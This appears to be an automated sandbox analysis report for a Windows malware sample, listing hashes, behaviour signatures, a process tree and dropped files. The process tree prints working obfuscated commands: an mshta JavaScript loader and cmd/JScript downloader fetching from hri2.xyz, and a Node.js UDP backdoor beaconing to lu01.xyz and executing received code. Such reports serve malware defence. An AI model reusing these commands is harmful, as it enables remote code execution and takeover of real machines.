Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
09-06-2021 09:55
Static task
static1
Behavioral task
behavioral1
Sample
euthree_20210608-233519.exe
Resource
win7v20210410
General
-
Target
euthree_20210608-233519.exe
-
Size
2KB
-
MD5
cd17d11bb2c8dd9942e816677df2dae2
-
SHA1
140fbc4ec7fd4be8c66dd38d6836473726fa7c1b
-
SHA256
5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f
-
SHA512
31180403ffbe4a2c2144bab8a93aed6d64c85a2c6658b44e8ee7cf8bc1a0e530de4141c0e685826f79457e396bb3d70a25c87ce30a142b481fc9bde0b93c6762
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.execscript.exeflow pid process 7 1020 mshta.exe 8 4004 cscript.exe -
Executes dropped EXE 1 IoCs
Processes:
node.exepid process 1312 node.exe -
Drops file in Windows directory 2 IoCs
Processes:
expand.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
euthree_20210608-233519.exemshta.execmd.execscript.exedescription pid process target process PID 4044 wrote to memory of 1020 4044 euthree_20210608-233519.exe mshta.exe PID 4044 wrote to memory of 1020 4044 euthree_20210608-233519.exe mshta.exe PID 4044 wrote to memory of 1020 4044 euthree_20210608-233519.exe mshta.exe PID 1020 wrote to memory of 4008 1020 mshta.exe cmd.exe PID 1020 wrote to memory of 4008 1020 mshta.exe cmd.exe PID 1020 wrote to memory of 4008 1020 mshta.exe cmd.exe PID 4008 wrote to memory of 4004 4008 cmd.exe cscript.exe PID 4008 wrote to memory of 4004 4008 cmd.exe cscript.exe PID 4008 wrote to memory of 4004 4008 cmd.exe cscript.exe PID 4008 wrote to memory of 2596 4008 cmd.exe expand.exe PID 4008 wrote to memory of 2596 4008 cmd.exe expand.exe PID 4008 wrote to memory of 2596 4008 cmd.exe expand.exe PID 4008 wrote to memory of 3564 4008 cmd.exe cscript.exe PID 4008 wrote to memory of 3564 4008 cmd.exe cscript.exe PID 4008 wrote to memory of 3564 4008 cmd.exe cscript.exe PID 3564 wrote to memory of 1312 3564 cscript.exe node.exe PID 3564 wrote to memory of 1312 3564 cscript.exe node.exe PID 3564 wrote to memory of 1312 3564 cscript.exe node.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();195;y=unescape('%339%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%32f%652%652%62%7E%326').split('~');150;try{x='WinHttp';35;x=new ActiveXObject(x+'.'+x+'Request.5.1');125;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);82;x.send();165;y='ipt.S';201;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);68;}catch(e){};129;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1623232554288.txt & cscript /nologo /e:jscript get1623232554288.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F2a42161be%26b%3D4d807304" node.cab & expand node.cab node.exe & del get1623232554288.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1623232554288.txt & cscript /nologo /e:jscript get1623232554288.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1623232554288.txt3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1623232554288.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F2a42161be%26b%3D4d807304" node.cab4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1623232554288.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\DNTException\get1623232554288.txtMD5
52ec5ebd8a447b5115ce83e703bcde51
SHA138ce97f87c6be668d07985558fc89c53e27770a3
SHA256ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615
SHA5129af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32
-
C:\ProgramData\DNTException\get1623232554288.txtMD5
e15f82747d0884d61a5bc4fb2db7d29d
SHA1aca478622586f17603fe56705fd319b75198b2b0
SHA256982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f
SHA512d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d
-
C:\ProgramData\DNTException\node.cabMD5
c7ed3d9304a29c8b472174bd910be071
SHA122b7d55b80acd434c13b0a2d8c59b45c10220a42
SHA256abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441
SHA512c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
memory/1020-114-0x0000000000000000-mapping.dmp
-
memory/1312-127-0x000000003D000000-0x000000003D001000-memory.dmpFilesize
4KB
-
memory/1312-123-0x0000000000000000-mapping.dmp
-
memory/1312-126-0x0000000025300000-0x0000000025301000-memory.dmpFilesize
4KB
-
memory/1312-128-0x000000000E800000-0x000000000E801000-memory.dmpFilesize
4KB
-
memory/1312-125-0x000000002C000000-0x000000002C001000-memory.dmpFilesize
4KB
-
memory/1312-129-0x000000000F100000-0x000000000F101000-memory.dmpFilesize
4KB
-
memory/1312-130-0x0000000026200000-0x0000000026201000-memory.dmpFilesize
4KB
-
memory/2596-118-0x0000000000000000-mapping.dmp
-
memory/3564-120-0x0000000000000000-mapping.dmp
-
memory/4004-116-0x0000000000000000-mapping.dmp
-
memory/4008-115-0x0000000000000000-mapping.dmp